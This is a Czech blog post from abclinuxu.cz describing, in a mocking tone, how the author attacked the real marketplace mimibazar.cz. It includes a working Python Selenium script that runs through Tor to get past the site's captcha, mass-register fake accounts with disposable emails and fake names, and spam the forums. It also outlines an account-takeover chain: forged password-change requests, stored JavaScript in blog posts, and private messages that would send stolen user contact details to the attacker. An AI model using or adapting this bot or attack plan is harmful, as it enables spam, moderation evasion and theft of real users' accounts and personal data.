abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
včera 21:11 | Nová verze

Vyšla nová verze 1.4.0 nástroje pro připojení ke vzdálené ploše Remmina. Mezi změnami figurují např. opravy autentizace přes SSH nebo nakládání se schránkou při připojení přes RDP. Sestavení dostupná z PPA pro Ubuntu skončí ve prospěch Flatpaku a Snapu.

Fluttershy, yay! | Komentářů: 4
21.2. 16:33 | Komunita

Google zveřejnil seznam 200 organizací přijatých do letošního Google Summer of Code (GSoC). Dle plánu se studenti přihlašují od 16. do 31. března. Vydělat si mohou od 3 000 do 6 600 dolarů. V Česku a na Slovensku 3 600 dolarů. Další informace v často kladených otázkách (FAQ). K dispozici jsou také statistiky z minulých let.

Ladislav Hagara | Komentářů: 1
21.2. 15:55 | IT novinky

Ve věku 74 let zemřel Lawrence Tesler. V 70. letech pracoval v Xerox PARC a posléze odešel do Apple. Zabýval se především zjednodušováním uživatelských rozhraní, byl odpůrcem modality a přispěl k prosazení moderního způsobu označování a kopírování textu – myší a klávesovými zkratkami (kombinace s XCV) – v raných Apple Human Interface Guidelines. Dále se podílel např. na vývoji Smalltalku a souvisejícího přenosného počítače Xerox NoteTaker nebo později PDA Apple Newton.

Fluttershy, yay! | Komentářů: 6
21.2. 13:11 | Zajímavý článek

Aktuální příspěvek What is Mobile PureOS? na stránkách společnosti Purism je věnován operačnímu systému Mobile PureOS, tj. PureOS pro mobilní zařízení a především pro telefon Librem 5. Víceméně se jedná o stabilní Debian s GNOME doplněný o balíčky phosh, phoc, libhandy, Calls, Chats a další.

Ladislav Hagara | Komentářů: 0
20.2. 19:33 | Zajímavý článek

Jozef Mlich se v příspěvku PinePhone je nové OpenMoko na svém blogu věnuje svému novému linuxovému chytrému telefonu PinePhone v edici BraveHeart: "Momentálně se pocity z tohohle zařízení dají přirovnat k BrokenMoku. Většina věcí prostě nefunguje. Minimálně ne sama od sebe. Začít se dá už u samotného hardware, kde existuje wiki stránka popisující nedostatky".

Ladislav Hagara | Komentářů: 24
20.2. 10:00 | Zajímavý projekt

Justine Haupt aktualizovala svůj open source mobilní telefon s rotační číselnicí a zveřejnila kompletní dokumentaci, vlastní kód, schémata i STL soubory pro 3D tisk. Desku plošných spojů případně i vytištěný obal lze koupit v jejím obchodu.

Ladislav Hagara | Komentářů: 40
20.2. 06:00 | IT novinky

Otevřená certifikační autorita Let's Encrypt v příspěvku na svém blogu informuje, že žádosti o vystavení certifikátů nově validuje z několika míst současně (Multi-Perspective Validation). Další informace v diskusním fóru.

Ladislav Hagara | Komentářů: 10
19.2. 13:55 | Nová verze

Byla vydána verze 15.0 na Debianu založené linuxové distribuce Untangle NG Firewall. Přehled novinek v poznámkách k vydání a ve videu na YouTube. Vyzkoušet lze (zatím neaktualizované) demo webového rozhraní.

Ladislav Hagara | Komentářů: 0
19.2. 12:11 | Pozvánky

Letošní ročník konference LinuxDays se uskuteční o víkendu 3. a 4. října, opět se potkáme v pražských Dejvicích na FIT ČVUT. Také během devátého ročníku nás budou čekat desítky přednášek, workshopy, stánky a spousta doprovodného programu. Aktuální dění můžete sledovat na Twitteru nebo Facebooku, přidat se můžete také do telegramové diskusní skupiny.

Petr Krčmář | Komentářů: 7
19.2. 10:22 | Zajímavý článek

Alexander Popov se v příspěvku na svém blogu podrobně věnuje možnostem zneužití bezpečnostní chyby CVE-2019-18683 v linuxovém podsystému V4L2. Videoukázka eskalace práv na YouTube. Chyba byla v upstreamu opravena v listopadu loňského roku. Alexander Popov se chybě věnoval ve své přednášce (pdf) na konferenci OffensiveCon 2020.

Ladislav Hagara | Komentářů: 1
Vydržela vám novoroční předsevzetí?
 (10%)
 (5%)
 (3%)
 (82%)
Celkem 185 hlasů
 Komentářů: 0
Rozcestník

mimibazar je děsně nebezpečnej

21.1. 20:13 | Přečteno: 3751×

Si myslim že tohleto jako nikdo z vás nepochopí!! Najdu matronám z mimibazaru stovky chyb a nedostatků na webu, jim tam hledám chyby pišu ať si koukaj vopravit tohleto a támdlencto a voni mě zato akorát pořád banujou bez jedinýho děkuju, absolutně ignorujou co jim pišu a na maily vubec nereagujou. A taky na mě byly sprostý!! :O :D

Celý pythoní zdrojáčky ‚útoku‘ jsou dole pod textíkem. Skoro všecko ještě po čtrnácti dnech od hraní si s mimibazarem funguje, akorát guerrilla mail je potřeba nahradit nějakou jinou službou, aspoň dokavaď guerrilla nepřikoupí nějakou novou doménu a musí se +- tři dny čekat na ruční ověření založenýho účtu ;D

Neni to žádnej hack, jenom ten jejich web budeme používat jakoby trošičku alternativně. Žádný hesla prolamovat nebudeme i když si jako nedělám jako žádný iluze jak supr zabezpečený tam tohleto maj (způsob jak by jako šlo snadno převzít cizej účet dokonce bez lámání hesla je popsanej kousek dál). Budeme zase přistupovat jenom k tomu co samy chtěj mit veřejně dostupný nebo co mužeme vidět když se tam zaregistrujeme jako běžná uživatelka. Si myslim že největší tragikomedie je, že už jenom tohleto vám stačí na to abyste celej ten web mimibazaru mohli na X dní potopit až uplně na dno žumpy, hlavně když zohledníte jak to tam ty matrony jako šíleně vedou :D :D :O :O :'( :'(

Jo a i když si to teda matrony jako vubec nezasloužej za to jak se na lidi ošklivě chovaj, teda jako aspoň na mě, tak jsem respektovala že mi jakoby na dělání něčeho víc nedaly souhlas. Se asi domnívaj že se jich nějakej zlej opravdickej hacker bude ptát co jako muže dělat a co už teda jako ne :D :D :D :D

jak se na mimibazaru zaregistrovat


Registrační formulář najdete tady hele

 


Heslo se musí skládat jenom z malejch a velkejch alfanumerickejch ascii znaků, žádnej speciální znak vám to u nich nevezme :D Kromě minimální délky hesla 5 znaků je ve formuláři zadrátovaná maximální délka hesel na 20 znaků. Klidně bych se vsadila že nebudou ani ukládaný v hashích ale v obyč plaintextu protože by je pak administrátorky jako nemohly posílat zapomětlivejm mamkám na registrační emailový adresy. Si to teda jenom myslim protože když pak dokončíte registraci příde vám za chvilku generovaný mailík a na něm je takový zajímavý že obsahuje první a poslední písmenko zadanýho hesla. Ale to je jenom jakoby takový moje tušení ;D

Všiměte si taky jaký tam jdou dělat srandovní kombinace zeměpisnejch míst v adrese. V obrázku mužete vidět že nějakej ten náš Kořenov jakoby leží v Českým Krumlově kterej samotnej je v Číně :D :D
Poštovní směrovací číslo si mužete vyplnit snad uplně jaký chcete, s těma rozšoupávacíma nabídkama vubec nijak nesouvisí. Ulici s číslem popisným taky.

No a uplně vespod toho formuláře je prastará ochrana proti botům kterou tam kdysi pradávno dali dávný předkové současnejch vývojářů mimibazaru :D Jmenuje se to QapTcha. Zdrojáček tý starobylý qaptchy mužete najít na githubu, poslední aktualizace rok 2012 :O :O
Když se kouknete na php skriptík qaptchy hele, tak jsem si myslela že ji pude přečůrat obyč postem vlastního falešnýho klíče ale to z nějakýho tajemnýho důvodu nefungovalo!!!! :O :O
Nejspíš tam maj nějak upravenou verzi tý jejich captchy protože soubor ve zdrojáčku webovky se jmenuje trošičku jinak než ten na githubu. No tak jsem měla dvě možnosti. Buďto zachytávat celou komunikaci a přijít co se jako vodkuď do čeho a v jakým pořadí posílá a tak nebo fakt nějak s tim posouvátkem hejbat jak by to dělal jako uživatel. Rozhodla jsem se pro nejrychlejší způsob. Teda, nejrychlejší pro napsání skriptíku ne jako pro jeho běh ;D
No zkrátka jsem na to vzala selenium. Selenium je taková supr věc co vám umožňuje řídit internetovej prohlížeč. Nainstalujete si patřičnej jakože driver pro prohlížeč a pak skrze to selenium mužete řídit :O :O Selenium se prej používá hlavně na automatický testování webových aplikací ale tady taky odvedlo supr práci ;D

Pro automatickou registraci armádičky botů jsem použila supr stránku na vytváření dočasnejch emailovejch adres guerrilla mail. Maj dokonce zadarmo dostupný API hele a je k tomu i trošičku starší pythoní knihovna. Po mým přesvěčování matron škádlením spambotama na sněhový pusinky si tam s guerillamailem už boužel neškrtneme. Účty teďko po registraci nechávaj navíc tři dny zablokovaný a čeká se na ruční ověření adminem. Tohle je jako samo řešení akorát dobrý na to abych si třeba našla něco jinýho na hraní protože co není hnedka tak jako by pro mě neexistuje ale samozřejmě mužeme bejt mnóóóóóóhem přesvěčivější a použít opravdický identity opravdickejch lidí z ulice. Už by to stálo jako asi víc úsilí ale cílenej spam by šlo pořát propasírovat dovnitř. Třeba zase někdy příště ;D

Si představte taky že by tam ta adminka jako popelka musela třídit ~20 opravdickejch účtů mezi stovkama regnutejch botů, jako slušnej prostor pro lidskou chybu ;D
Mimibazar vám taky umožňuje si nechat ověřit fyzickou adresu že vám jako matrony asi pošlou domu obálku s nějakým kódem nebo jak to funguje a pak tam jako mužete prodávat a nakupovat. Bejt zlá, tak už matronám dávno došly obálky a dopisní papír :D :D ;D

jak jsem nasdílela recept na sněhový pusinky


Věrný čtenáři mýho blogísku si určitě už Grétobota všimli pod receptem na sněhový pusinky hele. Za inspiraci pro název bota děkuju Radovanoj, kdybych udělala třeba nějakou chybku a mamky by mě dostaly a nepodařilo by se mi to hodit na nějakýho toho sumce/amiga tak to všechno hodim na tebe jestli neva ;D


Z toho našeho registrovanýho účtu budeme spamovat primitivním robotem po fóru můj úžasnej receptík na sněhový pusinky. Grétobot má připravený dvě sady vět, jednu sadu pro založení novýho vlákna a druhou sadu jako reakce na příspěvek ve fóru. Inteligenci nemá skoro žádnou, věty si vybírá uplně náhodně a skoro vždycky se zakecá sám se sebou :D :D
Si možná řikáte že dělat ty sady vět bylo uplně zbytečný a že Grétobot toho jako moc neumí a je jako k ničemu a nikoho nemá šanci přesvěčit. A to teda zase nene!! Emoční vypětí umí zajímavě s lidma hejbat takže i uplně hloupoučkej Grétobot za určitejch správnejch podmínek jako dovede úspěšně zdolat Turingův test :O :O :O :O :D :D :D :D

nastavení účtu je děsně supr


Vidíte to samý co já?? Se nás neptaj na naše současný heslo a ani jinak to tam není zabezpečený :O :O :D :D ty položky heslo a heslo znova je nastavování novýho hesla ;D Takže by jako stačilo prohlížečem nějaký ty přihlášený mamky poslat jeden jedinej blbej post s vlastním novým heslem a účet je už náš :O :O

 

si posíláme psaníčka


V tom nastavování účtu jste si možná všimli že tam jde snadno měnit taky svou emailovou adresu. Na tom samotným není asi nic špatnýho ale muže se to hodit v kombinaci s něčim dalším. Když posíláte novej soukromej vzkaz na tom jejich fóru, mužete zaškrtnout checkbox že chcete poslat kopii na svůj mail. Budeme jakoby psát na nějakej další mimibazarovej účet psaníčka s tim že si budeme posílat kopie na ‚svůj‘ mail kterej mezi psaníčka vždycky vyměníme za jinej. No tak jsem z mimibazaru napsala Ovčáčkoj na Pražskej hrad, Babišoj, Ivanoj Bartošoj, do nukibu, do Pentagonu… :O :D :D

Ty maily choděj z noreply@mimibazar.cz maj obrázek mimibazaru a je tam napsanej nick kterej je jako posílá. Až na vypínání odkazů je obsah +- identickej s obsahem psaníčka na fóru. Takže třeba chudák pan premiér si odkaz bude muset ručně nakopírovat z mailu do prohlížeče až jako bude chtít píct sněhový pusinky :O ;D To je samo jako spam skoro nahouby, jenže je to zase snadnej způsob jak by šlo dostat mimibazar na seznam spamovacích webů ;D

 

blogísek s javascriptem

Tak a teď tady máme zlatej hřeb ;D
Na mimibazaru si taky mužete založit blogísek a psát si tam jaký zajímavý hračky doma zkoušíte kde všude nakupujete a takový jiný děsně důležitý věci. Jejich blogísky maj tragicky nízkej počet zobrazení, a tomu asi jako odpovídá míra podpory ze strany vývojářů. No prostě na mimibazaru nás to nechá nacpat do blogískovýho zápisku javascript, jediná ochrana je v jejich webovým textovým editoru. Stačí ho jako deaktivovat a mužete si tam psát uplně co vás jako napadne :O :O :D :D :D :D :D :D
Jasný, co není vidět to se nemusí jako nijak moc řešit nééééé???? :D :D


Takže tady máme smrtící mix jenom s využitím zdrojů co nám hodnej mimibazar sám poskytuje :D
Bejt my jako ty zlý, tak si třeba uděláme blogísek s něčim děsně zajímavým na odpoutání pozornosti a odkud jako budeme malililinkatým javaskriptíkem posílat ty naše posty na změnu hesel. Mohli bysme třeba přidat jako ještě jeden post kterej by nám z přebíranýho účtu posílal soukromou zprávičku na náš mimibazarovej profil s informacema jako o tom převzatým účtu, adresu, telefon, mail... :O :O
No a odkaz na náš blogísek by jsme hromadně rozesílali soukromejma zprávama nebo na maily co bysme vydolovali na fóru. Najdete jich tam jako hóóóóódně a to si jako myslim že je pramenem jejich současnýho problému s ruskýma spammerama. Hlavně že tam zakázaly napsat slovo 'abclinuxu.cz' ;D

co si jako o tom všem myslim


Se stalo přesně to co jsem minule prorokovala v druhým odstavci sněhovejch pusinek hele :‘( samo že lopaty matrony natáhly a dodaly jim něco v hodnotě nedopalku cigarety zapíchnutýho do psího bobku na chodníku hnedka vedle popelnice a ještě celýho poblitýho od opilýho homelesáka :‘( :‘(
+- na tejden kuli tomu bez jakýhokoliv rozumnýho vysvětlení zmrazili databázi a stránky nechali jako read only, takže si mamky nejenomže mezi sebou nemohly posílat recepty na mňamozní bejlízy hele, ale taky mezi sebou nemohly kšeftovat jakoby v těch svejch e-schopech co jim ten mimibazar poskytuje. No a když si vezmete že tam některý ty mamky uměj udělat obrat i 600k měsíčně tak tejdení výpadek je v prasátku asi jako cejtit :O :O

Si ty hloupí adminky nejspíš neuvědomujou jaký maj vlastně úžasný štěstí že jsem se v tom rozhodla vrtat a nepřestala po jejich prvních sprostejch nadávkách. Si jako nedovedu vůbec přectavit že by moje mamka s někým takhle děsně sprostě mluvila jako co adminky mimibazaru psaly mě :O :O snad takhle adminky z mimibazaru neučej mluvit svoje děti protože to by už bylo pomaličku za hranou ohrožování mravní výchovy dítěte to co tam jako předváděj, si myslim :O :O
Takle na mě moje mamka nebyla sprostá ani když jsem kdysi dávno, asi předloni, takovým tim baseballovým míčkem na softball se kterým jsem doma měla zakázaný pinkat sestřelila z regálku takovýho porcelánovýho budhu a milej budha prosvištěl mamce pár cenťáků kolem hlavy a na parketách dosáhnul nirvány výbuchem na stovky uplně neslepitelnejch strašně řezavejch střepů který lítali uplně všude a pár se jich do těch parket taky zapíchlo že je skoro nebylo možný vyndat a táta na to musel vzit takovej ten vostrej šroubovák na rytí do dřeva :O :O Noa mě se rozšířil slovník sprostejch slovíček o hezkejch pár kousků :O :O :D :D Jenže ten propastnej rozdíl je vtom že moje mamka měla aspoň důvod se tak na mě chovat, matronám s mimibazaru jsem neudělala nic špatnýho a stejně jsou na mě sprostý a zlý :‘( :‘( jako já ale hlavně absolutně nechápu jako proč?!?!?!?! Se jim snažim pomoct a vony takhlen na mě :O :O Jsem nad tím přemejšlela a možná to je nějaká divná kombinace úchylný potřeby druhý nějak vychovávat současně s nějakejma komplexama co maj z těch ruskej spammerů co slovo 'rodinej' v názvu mimibazaru interpertujou krapátko jinak ;D si možná myslej že to co se tam děje nějak dělám já ale to je přece pitomost. Bych tam přece neházela recept na pusinky ne asi :'( :'(

Trošičku to celý s tim mimibazarem připomíná jakoby takový starání se o pokaděnýho starýho senilního důchodce co vubec netuší co se kolem něj děje a všeho se bojí a vy když ho chcete přebalit a umejt mu ten jeho pokaděnej zadek tak od něj zato schytáte jenom kotel sprostejch nadávek a možná pár ran vycházkovou holí přes holeňe :O :O :D :D Já to teda nedělám kuli těm hloupejm administrátorkám, těm i kdyby chcípaly na zemi ve strašnejch bolestech tak bych nepodala ani sklenici slaný vody za to jak na mě byly děsně sprostý a ošklivý. Jako takle, ze začátku to samo ode mě byla obyč škodolibost a taková jakoby zajímavá zábava dělat na tom mimibazaru bordýlek. Jenže pak mi začalo bejt těch uživatelek líto v jakým hnoji tam jako žijou aniž by jako byla nějaká vůle s tim něco udělat :‘( :‘(

Jako abych mamkám třeba nekřivdila, je taky možný že vývojáři nějak zkoušeli sabotovat mou komunikaci s adminkama protože co předvedli je jako šílenej šlenryján a hnusnej pokus někoho ošidit a jako poslední co potřebujou je aby se v tom vrtal někdo, kdo jako aspoň trošičku umí vycejtit že něco nehraje. No a teď si vemte jakou by měli vostudu kdyby jim zadky rozkopala malililililinkatatátá Grétulilililililililinka :O ;D :D :D :D
Bez odpovědi jsem z matron páčila kdo za tim vývojem webu jako stojí. Nóóóóóóóóóó chápu že se nechtěl podepsat :D ;D

skriptíčky


No a tady je samotnej skriptík. Potřebujete mit nainstalovanej tor browser, gecko driver + to z minula hele.
A taky tyhlety další pythoní knihovničky

obyč selenium a taky tor-browser-selenium:

pip install selenium
pip install tbselenium

knihovničku pro komunikaci s guerillamailem hele

pip install python-guerrillamail

knihovnu beautifulsoup4 na parsování html

pip install beautifulsoup4

A teďko ty samotný skripty. První je skript Grétobota

#!/usr/bin/python3
# -*- coding: utf-8 -*-

from tbselenium.tbdriver import TorBrowserDriver
from selenium import webdriver
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import JavascriptException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains

from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select

import time

#requesty použijeme na ověřování mailu
import requests
 
from fake_useragent import UserAgent
 
import random
import string
from guerrillamail import GuerrillaMailSession, GuerrillaMailClient
import json
from bs4 import BeautifulSoup

tor_proxy = {
    'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'
}

UserAgent().update()
headers = { 'User-Agent': UserAgent().edge }

#budeme potřebovat upravit session guerrilla mailu
#ta by tam jako normálně lezla z naší normální ip takže tam musíme nacpat proxy toru
#uděláme to poděděním protože potomek jako přepiše metodu rodiče

class GuerrillaMailClient_proxy(GuerrillaMailClient):
    def _do_request(self, session_id, **kwargs):
        url = self.base_url + '/ajax.php'
        
        #kwargs jsou parametry requestu
        #musej tam bejt ip adresa 'ip' a funkci co jako chceme províst 'f' podle https://www.guerrillamail.com/GuerrillaMailAPI.html 
        #to 'f' si vyplňujou jiný metody co tuhletu volaj
        kwargs['ip'] = "0.0.0.0"
        if session_id is not None:
            kwargs['sid_token'] = session_id
        #sem se strčí argument proxies
        response = requests.get(url,proxies=tor_proxy,params=kwargs)
        #zbytek mužem asi nechat jako to už bylo 
        try:
            response.raise_for_status()
        except requests.HTTPError as e:
            raise GuerrillaMailException(('Request failed: {e.request.url} ' +
                    '{e.response.status_code} {e.response.reason}').format(e=e))
        data = json.loads(response.text)
        return data

#funkce na dělání náhonej stringů třeba jejich supr bezpečnejch hesel hesel :D

def randString(num_chars=10):
   letters = string.ascii_lowercase
   return ''.join(random.choice(letters) for i in range(num_chars))

#seznam nejčastejších jmen podle wikipedie
#budeme z něj náhodně vybírat :D :D
prijmeni_list=["Nováková","Svobodová","Novotná","Dvořáková","Černá","Procházková","Kučerová","Veselá","Horáková","Němcová","Pokorná","Marková","Pospíšilová","Hájková","Jelínková","Králová","Růžičková","Benešová","Fialová","Sedláčková","Doležalová","Zemanová","Nguyen","Nguyen Thi","Nguyenová","Kolářová","Krejčová","Krejčí","Navrátilová","Čermáková","Urbanová","Vaňková","Blažková","Křížová","Kratochvílová","Kovářová","Kopecká","Bartošová","Vlčková","Musilová","Šimková","Poláková","Konečná","Malá","Čechová","Kadlecová","Štěpánková","Staňková","Holubová","Dostálová","Soukupová","Šťastná","Marešová","Sýkorová","Moravcová","Tichá","Valentová","Vávrová","Matoušková","Bláhová","Říhová","Ševčíková","Burešová","Hrušková","Mašková","Pavlíková","Dušková","Hrubá","Havlíčková","Jandová","Machová","Müllerová","Lišková"]

jmena_list=["Marie","Jana","Eva","Hana","Anna","Lenka","Kateřina","Věra","Lucie","Alena","Petra","Jaroslava","Veronika","Martina","Jitka","Tereza","Ludmila","Helena","Michaela","Zdeňka","Ivana","Jarmila","Monika","Zuzana","Jiřina","Markéta","Eliška","Marcela","Barbora","Dagmar","Dana","Kristýna","Vlasta","Božena","Irena","Miroslava","Libuše","Pavla","Marta","Adéla","Andrea"]

#uděláme funkci co nás registruje odklikne mail a všude vyvěsí náš supr recept ;D
#někdy muže selhat takže by bylo dobrý ji volat v cyklu dokavaď se třeba nepovede
def register():
    
    #sezení guerrilla mailu pro komunikaci s jejich API
    mail_session = GuerrillaMailSession()
    mail_session.client=GuerrillaMailClient_proxy() #strčíme tam náš upravenej objekt
    mail_str=mail_session.get_session_state()['email_address'] #a vezmem si string mailu

    with TorBrowserDriver("/home/greta/.pppššššššššš/tor-browser_en-US/") as driver:
        try:
            driver.get('https://www.mimibazar.cz/reg.php')
        except TimeoutException:
            print("nějak dlouho to trvá než prohlížeč přeleze na stránku jako!!")
            return False
        delay = 10 # doba čekání na element v sekundách
        #ui-accordion-regforms-header-0 je takový rozbalovací tlačítko na který se musí nejdřiv kliknout aby se mohlo registrovat
        try:
            myElem = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.ID, 'ui-accordion-regforms-header-0')))
        except TimeoutException:
            print("nějak dlouho to trvá čekat na ui-accordion-regforms-header-0 jako!!")
            return False

        # cc_banner je taková jakoby lištička s něčim o přijímání cookies 
        #někdy to muže vadit seleniu při klikání na věci takže ten cc_banner musíme jakoby schovat
        try:
            myElem = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.CLASS_NAME, 'cc_banner')))
        except TimeoutException:
            print("nějak dlouho to trvá čekat na cc_banner jako!!")
            return False
        
        #snížíme se k použití javaskriptíku na zmizení toho cc_banneru
        js_string = "return document.getElementsByClassName('cc_banner')[0].remove();"
        try:
            driver.execute_script(js_string)
        except JavascriptException:
            print("nějak dlouho to trvá čekání na provedení js!!")
            driver.quit()
            return False
        
        time.sleep(5) #správně by se mělo čekat třeba na oběvení nějakýho konrétního elementu v tom html ale takhle to stačí páč funguje ;D
        driver.find_element_by_id("ui-accordion-regforms-header-0").click()
        time.sleep(5)
        
        #najdeme jako všechny ty vyplňovací inputy registračního formuláře
        #ty jména najdete když si zobrazíte zdrojáček tý registrační stránky
        #nebo když zachytíte post request v prohlížeči
        login = driver.find_element_by_name("login")
        password = driver.find_element_by_name("password")
        password_2 = driver.find_element_by_name("password_2")
        jmeno = driver.find_element_by_name("jmeno")
        prijmeni = driver.find_element_by_name("prijmeni")
        nick = driver.find_element_by_name("nick")
        email = driver.find_element_by_name("email")
        ulice = driver.find_element_by_name("ulice")
        obec = driver.find_element_by_name("obec")
        psc = driver.find_element_by_name("psc")
        
        select_zeme = Select(driver.find_element_by_name("zeme"))
        select_zeme.select_by_index(random.randint(1,100))
        #uplně stejně vybereme oblast
        #jsem se tady hóóóóódně naučila o zemáku :D třeba že švícarsko leží v afgánistánu :O :O
        select_oblast = Select(driver.find_element_by_name("oblast"))
        select_oblast.select_by_index(random.randint(1,100))
        
        #odklikneme takový ty checkboxy jakože souhlasíme s podmínkama a zpracováním osobních údajů
        podminky = driver.find_element_by_name("podminky")
        podminky.click()
        zpracovaniou = driver.find_element_by_name("zpracovaniou")
        zpracovaniou.click()
        
        #cituju: "Vaše heslo může obsahovat pouze čísla a písmena bez diakritiky" :D :D :D :D
        passwd_str=randString(20)
        nazev="Gretobot_"+randString(4)
        
        print("login: "+nazev)
        print("mail: "+mail_str)
        print("password: "+passwd_str)

        #a vyplníme samotnej formulář
        
        
        login.send_keys(nazev)
        password.send_keys(passwd_str)
        password_2.send_keys(passwd_str)
        #vybereme si náhodný jméno
        jmeno.send_keys(random.choice(jmena_list))
        prijmeni.send_keys(random.choice(prijmeni_list))
        nick.send_keys(nazev)
        
        #náhodná ulice a obec
        #ale jakože uplně náhodnej řetězec :D :D :D :D
        ulice.send_keys(randString(10))
        obec.send_keys(randString(10))
        
        #poštovní směrovací číslo je prej pět čísel a nikdy nezačíná osmičkou a víc :O
        psc.send_keys(str(random.randint(10000,79999)))
        
        #ješte mužeme nahradit zadní kus stringu mailu jinou doménou guerrilla mailu
        #maj jich tam hodně a když třeba použijete '@sharklasers.com' tak to jako
        #chvilku asi muže trvat než jim dojde co se jako děje :O :O
        email.send_keys(mail_str.split("@")[0]+"@guerrillamail.com")
        time.sleep(5)
        
        #teď už máme vyplněnej formulář a mužeme se pustit do tý protibotí ochrany
        
        #tady je jako ta tajemná starodávná posouvací lišta
        #musíme na ni posunout takový posouvátko
        source_element = driver.find_element_by_class_name('ui-draggable')
        
        #nejdřiv k ní seskrolujeme protože musí bejt jakoby vidět
        #protože dělat drag&drop jde jenom s tim co je vidět
        source_element.location_once_scrolled_into_view
        #posuneme posouvátko o 250 pixelů doprava že na něj jakoby klikneme myší držíme a jedem
        ActionChains(driver).drag_and_drop_by_offset(source=source_element, xoffset=250, yoffset=0).perform()

        #a teď ten vyplněnej formář mužeme poslat
        time.sleep(5)
        driver.find_element_by_class_name("submit").click()
        driver.quit() #už tor browser nepotřebujem tak ho vypnem
        
        #počkáme si až nám příde zprávička a jakoby klikneme na ověřovací odkaz  v ní
        #podpora@mimibazar.cz
        
        #selenium jsme jako použili na obejití tý jejich starodávný javaskriptíkový ochrany před botama
        #dál budeme zase používat knihovničku requests protože selenium je jako dost šneček v porovnání s nima :'(
        #vypnem selenium
        time.sleep(5)
        
        #vyrobíme si objekt session kterej bude držet jakože naše sezení
        #potřebujem když se chceme dostat za heslem chráněnej obsah abysme mohli do diskuzí poslat odkaz na náš báječnej recept
        #všechny requesty budem posílat z toho objektu session
        session = requests.session()
        session.proxies=tor_proxy
        session.headers=headers
        
        #počkáme si až nám příde zprávička od podpora@mimibazar.cz a jakoby klikneme na ověřovací odkaz  v ní
        for i in range(15):
            #vezmeme si seznam doručenejch zpráv a budeme hledat odesilatele 'podpora@mimibazar.cz'
            inbox=mail_session.get_email_list()
            for msg in inbox:
                print("sender: "+msg.sender)
                if "podpora@mimibazar.cz" == msg.sender:
                    #samotnej objekt mail v proměný msg má atribut body ale je prázdný :'(
                    #textík zprávy musíme vytáhnout ze session pomocí id mailu
                    id=msg.guid
                    mail_body=mail_session.get_email(id).body
                    #tělíčko toho majlu je jakoby takový html takže ho tak budeme parsovat pomocí knihovny BeautifulSoup
                    soup = BeautifulSoup(mail_body, "lxml")
                    #najdem první výskyt odkazu protože to je jako náš hledanej
                    #klíčkem 'href' získáme samotnej odkaz
                    link = soup.find("a")['href']
                    print("Ověřovací odkaz: "+link)
                    #jakoby to prokliknem že pošleme request get z objektu session
                    #nás to rovnou jakože i přihlásí tím prokliknutím na mimibazar ;D
                    req=session.get(link, proxies=tor_proxy,headers=headers)
                    print(req.status_code)
                    
                    #a uložíme si pro jistotu registrovanej účet do texťáčku pro strejčka příhodu :D :D
                    with open("/home/greta/army.txt","a+") as army:
                        army.write("login: "+login_str+"\n")
                        army.write("password: "+passwd_str+"\n")
                        army.write("mail: "+mail_str+"\n")
                        army.write("\n")
                        army.close()
                        
                    
                    #sem původně jako chtěla vyplnit jenom formulář na https://www.mimibazar.cz/novy_recept.php a dát tam jako link sem na recept ve svým blogísku
                    #jenže je tam vtom formuláři červeným písmem jakože napsaný že se tam nesmí dávat jenom odkaz takže receptík budu muset děsně nenápadně šířit u nich v diskuzích :'(
                    
                    
                    #získáme seznam query kódů nedávno komentovanejch diskuzí
                    #query string je takovýto jakoby to za otazníčkama v url jako těba index.php?sfsj=123
                    
                    codes=[] # sem si ty k=ody budeme schovávat
                    req=session.get("https://www.mimibazar.cz/posledni_prispevky.php", proxies=tor_proxy,headers=headers)
                    print(req.status_code)
                    
                    #načteme si odpověď serveru v parseru BeautifulSoup a najdem v něm všechny odkazy <a href=""></a>
                    soup = BeautifulSoup(req.text, "lxml")
                    links=soup.find_all("a",href=True)
                    for link in links:
                        print(link)
                        url=link["href"]
                        if("diskuse.php?forum=" in url):
                            #rozpůlime řetězec v místě rovnítka a vezmeme si tu půlku za rovnítkem
                            code=url.split("=")[1]
                            codes.append(code)
                            
                    #chceme jenom unikátní hodnoty
                    #toho dosáhnem  převodem listu na sadu
                    codes=set(codes)
                    #a převedeme na tuple. tuple je to samý jako list ale jakoby konstatní takže ty elementy už nejde měnit
                    codes=tuple(codes)
                    print(codes)



                    #nějaký jakože textíky aby jsme byli děsně nenápadný
                    #ty slova v textu v těch kulatejch závorkách jsou některý smajlíky
                    texty=[]
                    
                    texty.append("nejvíc nejlepší sněhový pusinky (koule) (koule)!!")
                    texty.append("musíte se jako něco dozvědět o sněhovejch pusinkách taky jako!!")
                    texty.append("si myslim že neumíte pořádně udělat sněhový pusinky žejo?? tak koukejte :-) :-) :-) :-)")
                    texty.append("tohleto jako musíte zkusit upíct :-) :-)!!")
                    texty.append("sněhoví pusinky maj tajemství. čtěte!!")
                    texty.append("že jste jako ještě nečetly o mejch sněhovejch pusinkách??")
                    texty.append("už ste viděly muj děsně tajnej recept na sněhový pusinky??")
                    texty.append("co je jako nejvíc nejlepší?? Grétiny sněhoví pusinky!!!!")
                    texty.append("(novy rok) do novýho roku vám přeju mír lásku a spustu sněhovejch pusinek ,-) ,-) !!!!")
                    texty.append("si myslim že jste nervózní protože vám chybí curk. tak hele")
                    texty.append("MŇAMOZNÍ recept jako na sněhoví pusinky (L) (L)")
                    texty.append("ukážu vám nejvíc nejlepší  (stromecek) (stromecek) vánoční  (stromecek) (stromecek) cukroví")
                    texty.append("tohleto musíte jako prostě vidět!!")
                    texty.append("grétiny sněhový (k) (k) (k) (k)")
